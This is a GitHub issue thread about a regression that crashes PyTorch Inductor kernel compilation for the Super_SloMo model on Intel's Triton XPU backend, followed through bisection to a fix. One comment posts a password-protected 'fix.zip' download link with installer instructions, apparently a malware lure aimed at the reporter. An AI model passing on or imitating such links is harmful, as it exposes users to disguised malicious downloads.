### ISSUE TITLE
[Regression] PyTorch Inductor kernel compilation crash, found in Super_SloMo model

### ISSUE THREAD

**Issue by retonym** [intel/intel-xpu-backend-for-triton#2004]
I have encountered a regression when using the latest commit c451d56744e72e9659f07b1acd9286087bd58078 of Intel Triton. This issue was not present with the older release v3.0.0b2 from https://github.com/intel/intel-xpu-backend-for-triton/releases/tag/v3.0.0b2.

This crash is found when running torchbench model Super_SloMo amp_fp16 inference.

Reproduce script is attached.  
[cb3kg7hyjf2vlfwtzgqcrlvxkwt6jt3mbareknyyloxok4vfu75s.zip](https://github.com/user-attachments/files/16745351/cb3kg7hyjf2vlfwtzgqcrlvxkwt6jt3mbareknyyloxok4vfu75s.zip)

A smaller reproducer. I narrowed down to the single failed triton kernels among groups of kernels in this model.
[triton_crash_mini.zip](https://github.com/user-attachments/files/16782160/triton_crash_mini.zip)

**Comment by llowvxe** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by retonym** [comment]
Hi @llowvxe ，thanks for the advice. I re-upload file in .zip format, no password needed.

**Comment by pbchekin** [comment]
Super_SloMo is a part of torchbech: https://github.com/pytorch/benchmark/tree/main/torchbenchmark/models/Super_SloMo.

**Comment by pbchekin** [comment]
I've started E2E accuracy workflow for Super_SloMo for all available combinations:
https://github.com/intel/intel-xpu-backend-for-triton/actions/runs/10561574231

All combinations passed, except training, float32:

```
E0826 14:53:27.426000 11801 torch/_dynamo/utils.py:1704] Accuracy failed: allclose not within tol=0
E0826 14:53:27.426000 11801 torch/_dynamo/utils.py:1580] Accuracy failed for key name ArbTimeFlowIntrp.conv1.bias.grad
eager_two_runs_differ
```

https://github.com/intel/intel-xpu-backend-for-triton/actions/runs/10561574231/job/29257614096#step:30:85

However, there are no kernel combination crashes.

**Comment by pbchekin** [comment]
@retonym what's your environment: GPU driver, PyTorch dependency bundle, etc? Please try to use the nightly wheels, which are attached as artifacts to https://github.com/intel/intel-xpu-backend-for-triton/actions/workflows/nightly-wheels.yml.

**Comment by retonym** [comment]
Hi @pbchekin , I ran the nightly whl with commit e29acf87c6825de11b356f1aa7b67ec4210626f7, and still encountered the crash.

Here is the environment:
- compiler: Intel(R) oneAPI DPC++/C++ Compiler 2024.2.1 (2024.2.1.20240711)
- driver: agama-881
- pytorch: 7868b65c4d4f34133607b0166f08e9fbf3b257c4
- torch-xpu-ops: e0408741414624dc266849236b6bab1ea2720b96

**Comment by retonym** [comment]
Hi @vlad-penkin , I align with your environment, but still get the same crash.|

- compiler: Intel(R) oneAPI DPC++/C++ Compiler 2024.1.4 (2024.1.4.20240802)
- driver: agama 950
- pytorch: 2ba60a1618813c91b26ca0860242626b22832295 (2024/8/27 commit)
- torch-xpu-ops: use the commit pinned by pytorch repo.
- intel-triton: 386ae76aebefa156d858f8cf6f58247764067340 (2024/8/27 commit)

**Comment by alexbaden** [comment]
I was able to reproduce and bisect to determine the date the issue was introduced.

The issue was introduced by https://github.com/intel/intel-xpu-backend-for-triton/pull/1364 on June 16, 2024. 

```
* | eddd58ed Merge commit 'e8445b1f949b97f6e9306a998b10a01613bf1c00' -- confirmed bad 
|\| 
| * e8445b1f [AMD] Support convert WMMA to linear layout (#4134)
| * 23295314 Use LLs for register-to-register convert-layout ops. (#4125)
| * 7378f3af [BUILD] Change hatchet as an extra dependency (#4138)
| * 4a1ea8e1 [AMD][gfx11] Fix BF16 wmma instr generation (#4135)
| * 3d5cd67c [DOCS] Add parameter types and improve docs for core.py (#4133)
* | 5aec251e Skip list for tutorials (#1362) -- confirmed good 
```

I will update this ticket when a path to fix has been identified.

**Comment by vlad-penkin** [comment]
Our E2E script always add `--freezing` option. The issue is reproducible locally with the following command `ZE_AFFINITY_MASK=0 python benchmarks/dynamo/torchbench.py --accuracy --amp -dxpu -n10 --no-skip --dashboard --inference --backend=inductor --freezing --timeout=4800 --output=log.csv --only=Super_SloMo`

**Comment by alexbaden** [comment]
490e735a032e9fb5b5e161b4d87de24447eab075 has been pushed to the `release/2.5.0` branch, which resolves this issue.
